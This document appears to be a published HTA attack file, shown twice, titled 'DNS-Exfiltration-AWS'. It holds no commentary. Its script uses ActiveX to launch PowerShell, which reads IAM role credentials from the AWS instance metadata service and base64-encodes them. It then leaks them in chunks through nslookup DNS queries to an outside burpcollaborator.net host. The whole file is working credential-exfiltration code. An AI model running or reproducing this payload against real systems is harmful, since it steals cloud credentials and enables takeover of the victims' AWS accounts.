hateshape/DNS-Exfiltration-AWS.hta

## DNS-Exfiltration-AWS.hta
<html><head><meta name=ProgId content=htafile></head>
<hta:application id=x><script>
try { if (x.commandLine != ""){
new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
meta-data/iam/security-credentials/aws-ec2-role;$b=($a|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
 }
}
catch(ex){ alert('Error');}
</script>
</html>
	<html><head><meta name=ProgId content=htafile></head>
	<hta:application id=x><script>
	try { if (x.commandLine != ""){
	new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
	meta-data/iam/security-credentials/aws-ec2-role;$b=($a\|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
	em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'\| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
	String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
	}
	}
	catch(ex){ alert('Error');}
	</script>
	</html>